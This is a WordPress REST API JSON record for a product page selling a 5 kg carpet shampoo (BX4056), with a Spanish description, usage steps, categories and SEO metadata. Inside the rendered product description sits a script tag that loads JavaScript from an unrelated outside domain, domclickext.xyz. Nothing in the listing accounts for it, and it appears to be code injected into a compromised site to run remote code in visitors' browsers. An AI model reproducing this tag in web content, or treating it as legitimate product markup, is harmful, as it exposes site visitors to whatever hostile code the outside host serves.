{"id":9718,"date":"2019-09-08T16:17:09","date_gmt":"2019-09-08T15:17:09","guid":{"rendered":"http:\/\/www.meprolim.es\/?post_type=product&#038;p=9718"},"modified":"2023-05-20T06:37:04","modified_gmt":"2023-05-20T05:37:04","slug":"bidon-5kg-aquagen-tmc-champu-moquetas","status":"publish","type":"product","link":"https:\/\/meprolim.es\/fr\/producto\/quimicos-y-articulos-de-limpieza\/productos-quimicos-industriales-fr-2\/limpieza-alfombras-fr-2\/espuma-en-seco-fr-2\/bidon-5kg-aquagen-tmc-champu-moquetas\/","title":{"rendered":"BID\u00d3N 5KG AQUAGEN TMC CHAMP\u00da MOQUETAS &#8211; C\u00d3DIGO: BX4056"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row][vc_column][vc_column_text]<\/p>\n<p style=\"text-align: justify;\">Penetra en las fibras y elimina la suciedad, sin mojar en exceso el tejido. El secado en forma de polvo, facilita la eliminaci\u00f3n final del residuo. Neutraliza olores desagradables sin enmascararlos. No altera el color ni la calidad de las fibras. Eficaz contra las manchas.<\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>Caracter\u00edsticas:<\/p>\n<ul>\n<li>Producto l\u00edquido transparente.<\/li>\n<li>Color: azul.<\/li>\n<li>Perfume: caracter\u00edstico.<\/li>\n<li>USO CON M\u00c1QUINA: dosificar 1-5 % de producto en el dep\u00f3sito del agua limpia de la m\u00e1quina.<\/li>\n<li>Proceder del modo habitual.<\/li>\n<li>Dejar secar completamente.<\/li>\n<li>Aspirar a fondo la moqueta para eliminar los residuos.<\/li>\n<li>USO MANUAL: pulverizar el producto sobre la superficie.<\/li>\n<li>Frotar y dejar secar.<\/li>\n<li>Pasar un cepillo o aspirador para eliminar el residuo.<\/li>\n<li>Antes de usar, comprobar la solidez y la compatibilidad con el material en una zona no visible.<\/li>\n<li>pH 8.<\/li>\n<\/ul>\n<p><strong>SKU: BX4056<\/strong><\/p>\n","protected":false},"featured_media":9716,"template":"","meta":[],"product_brand":[],"product_cat":[867,1047,652,94],"product_tag":[288,287,654],"class_list":{"0":"post-9718","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-espuma-en-seco","7":"product_cat-limpieza-alfombras","8":"product_cat-productos-quimicos-industriales","9":"product_cat-quimicos-articulos-limpieza","10":"product_tag-espuma-seca","11":"product_tag-lavamoquetas","12":"product_tag-productos-quimicos","14":"first","15":"instock","16":"shipping-taxable","17":"product-type-simple"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>BID\u00d3N 5KG AQUAGEN TMC CHAMP\u00da MOQUETAS - C\u00d3DIGO: BX4056 - Meprolim<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/limpieza-alfombras\/espuma-en-seco\/bidon-5kg-aquagen-tmc-champu-moquetas\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"BID\u00d3N 5KG AQUAGEN TMC CHAMP\u00da MOQUETAS - C\u00d3DIGO: BX4056 - Meprolim\" \/>\n<meta property=\"og:description\" content=\"Caracter\u00edsticas:   Producto l\u00edquido transparente.  Color: azul.  Perfume: caracter\u00edstico.  USO CON M\u00c1QUINA: dosificar 1-5 % de producto en el dep\u00f3sito del agua limpia de la m\u00e1quina.  Proceder del modo habitual.  Dejar secar completamente.  Aspirar a fondo la moqueta para eliminar los residuos.  USO MANUAL: pulverizar el producto sobre la superficie.  Frotar y dejar secar.  Pasar un cepillo o aspirador para eliminar el residuo.  Antes de usar, comprobar la solidez y la compatibilidad con el material en una zona no visible.  pH 8.  SKU: BX4056\" \/>\n<meta property=\"og:url\" content=\"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/limpieza-alfombras\/espuma-en-seco\/bidon-5kg-aquagen-tmc-champu-moquetas\/\" \/>\n<meta property=\"og:site_name\" content=\"Meprolim\" \/>\n<meta property=\"article:modified_time\" content=\"2023-05-20T05:37:04+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/09\/BX4056.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"768\" \/>\n\t<meta property=\"og:image:height\" content=\"768\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/quimicos-articulos-limpieza\\\/productos-quimicos-industriales\\\/limpieza-alfombras\\\/espuma-en-seco\\\/bidon-5kg-aquagen-tmc-champu-moquetas\\\/\",\"url\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/quimicos-articulos-limpieza\\\/productos-quimicos-industriales\\\/limpieza-alfombras\\\/espuma-en-seco\\\/bidon-5kg-aquagen-tmc-champu-moquetas\\\/\",\"name\":\"BID\u00d3N 5KG AQUAGEN TMC CHAMP\u00da MOQUETAS - C\u00d3DIGO: BX4056 - Meprolim\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/quimicos-articulos-limpieza\\\/productos-quimicos-industriales\\\/limpieza-alfombras\\\/espuma-en-seco\\\/bidon-5kg-aquagen-tmc-champu-moquetas\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/quimicos-articulos-limpieza\\\/productos-quimicos-industriales\\\/limpieza-alfombras\\\/espuma-en-seco\\\/bidon-5kg-aquagen-tmc-champu-moquetas\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/BX4056.jpg\",\"datePublished\":\"2019-09-08T15:17:09+00:00\",\"dateModified\":\"2023-05-20T05:37:04+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/quimicos-articulos-limpieza\\\/productos-quimicos-industriales\\\/limpieza-alfombras\\\/espuma-en-seco\\\/bidon-5kg-aquagen-tmc-champu-moquetas\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/meprolim.es\\\/producto\\\/quimicos-articulos-limpieza\\\/productos-quimicos-industriales\\\/limpieza-alfombras\\\/espuma-en-seco\\\/bidon-5kg-aquagen-tmc-champu-moquetas\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/quimicos-articulos-limpieza\\\/productos-quimicos-industriales\\\/limpieza-alfombras\\\/espuma-en-seco\\\/bidon-5kg-aquagen-tmc-champu-moquetas\\\/#primaryimage\",\"url\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/BX4056.jpg\",\"contentUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/09\\\/BX4056.jpg\",\"width\":768,\"height\":768},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/producto\\\/quimicos-articulos-limpieza\\\/productos-quimicos-industriales\\\/limpieza-alfombras\\\/espuma-en-seco\\\/bidon-5kg-aquagen-tmc-champu-moquetas\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Catalogue\",\"item\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/catalogue\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"BID\u00d3N 5KG AQUAGEN TMC CHAMP\u00da MOQUETAS &#8211; C\u00d3DIGO: BX4056\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/\",\"name\":\"Meprolim\",\"description\":\"Cavas Catalanas S.L.\",\"publisher\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#organization\",\"name\":\"Meprolim\",\"url\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/07\\\/cropped-logo2.png\",\"contentUrl\":\"https:\\\/\\\/meprolim.es\\\/wp-content\\\/uploads\\\/2019\\\/07\\\/cropped-logo2.png\",\"width\":401,\"height\":162,\"caption\":\"Meprolim\"},\"image\":{\"@id\":\"https:\\\/\\\/meprolim.es\\\/fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"BID\u00d3N 5KG AQUAGEN TMC CHAMP\u00da MOQUETAS - C\u00d3DIGO: BX4056 - Meprolim","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/limpieza-alfombras\/espuma-en-seco\/bidon-5kg-aquagen-tmc-champu-moquetas\/","og_locale":"fr_FR","og_type":"article","og_title":"BID\u00d3N 5KG AQUAGEN TMC CHAMP\u00da MOQUETAS - C\u00d3DIGO: BX4056 - Meprolim","og_description":"Caracter\u00edsticas:   Producto l\u00edquido transparente.  Color: azul.  Perfume: caracter\u00edstico.  USO CON M\u00c1QUINA: dosificar 1-5 % de producto en el dep\u00f3sito del agua limpia de la m\u00e1quina.  Proceder del modo habitual.  Dejar secar completamente.  Aspirar a fondo la moqueta para eliminar los residuos.  USO MANUAL: pulverizar el producto sobre la superficie.  Frotar y dejar secar.  Pasar un cepillo o aspirador para eliminar el residuo.  Antes de usar, comprobar la solidez y la compatibilidad con el material en una zona no visible.  pH 8.  SKU: BX4056","og_url":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/limpieza-alfombras\/espuma-en-seco\/bidon-5kg-aquagen-tmc-champu-moquetas\/","og_site_name":"Meprolim","article_modified_time":"2023-05-20T05:37:04+00:00","og_image":[{"width":768,"height":768,"url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/09\/BX4056.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"Dur\u00e9e de lecture estim\u00e9e":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/limpieza-alfombras\/espuma-en-seco\/bidon-5kg-aquagen-tmc-champu-moquetas\/","url":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/limpieza-alfombras\/espuma-en-seco\/bidon-5kg-aquagen-tmc-champu-moquetas\/","name":"BID\u00d3N 5KG AQUAGEN TMC CHAMP\u00da MOQUETAS - C\u00d3DIGO: BX4056 - Meprolim","isPartOf":{"@id":"https:\/\/meprolim.es\/fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/limpieza-alfombras\/espuma-en-seco\/bidon-5kg-aquagen-tmc-champu-moquetas\/#primaryimage"},"image":{"@id":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/limpieza-alfombras\/espuma-en-seco\/bidon-5kg-aquagen-tmc-champu-moquetas\/#primaryimage"},"thumbnailUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/09\/BX4056.jpg","datePublished":"2019-09-08T15:17:09+00:00","dateModified":"2023-05-20T05:37:04+00:00","breadcrumb":{"@id":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/limpieza-alfombras\/espuma-en-seco\/bidon-5kg-aquagen-tmc-champu-moquetas\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/limpieza-alfombras\/espuma-en-seco\/bidon-5kg-aquagen-tmc-champu-moquetas\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/limpieza-alfombras\/espuma-en-seco\/bidon-5kg-aquagen-tmc-champu-moquetas\/#primaryimage","url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/09\/BX4056.jpg","contentUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/09\/BX4056.jpg","width":768,"height":768},{"@type":"BreadcrumbList","@id":"https:\/\/meprolim.es\/producto\/quimicos-articulos-limpieza\/productos-quimicos-industriales\/limpieza-alfombras\/espuma-en-seco\/bidon-5kg-aquagen-tmc-champu-moquetas\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/meprolim.es\/fr\/"},{"@type":"ListItem","position":2,"name":"Catalogue","item":"https:\/\/meprolim.es\/fr\/catalogue\/"},{"@type":"ListItem","position":3,"name":"BID\u00d3N 5KG AQUAGEN TMC CHAMP\u00da MOQUETAS &#8211; C\u00d3DIGO: BX4056"}]},{"@type":"WebSite","@id":"https:\/\/meprolim.es\/fr\/#website","url":"https:\/\/meprolim.es\/fr\/","name":"Meprolim","description":"Cavas Catalanas S.L.","publisher":{"@id":"https:\/\/meprolim.es\/fr\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/meprolim.es\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/meprolim.es\/fr\/#organization","name":"Meprolim","url":"https:\/\/meprolim.es\/fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/meprolim.es\/fr\/#\/schema\/logo\/image\/","url":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/07\/cropped-logo2.png","contentUrl":"https:\/\/meprolim.es\/wp-content\/uploads\/2019\/07\/cropped-logo2.png","width":401,"height":162,"caption":"Meprolim"},"image":{"@id":"https:\/\/meprolim.es\/fr\/#\/schema\/logo\/image\/"}}]}},"_links":{"self":[{"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/product\/9718","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/media\/9716"}],"wp:attachment":[{"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/media?parent=9718"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/product_brand?post=9718"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/product_cat?post=9718"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/meprolim.es\/fr\/wp-json\/wp\/v2\/product_tag?post=9718"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}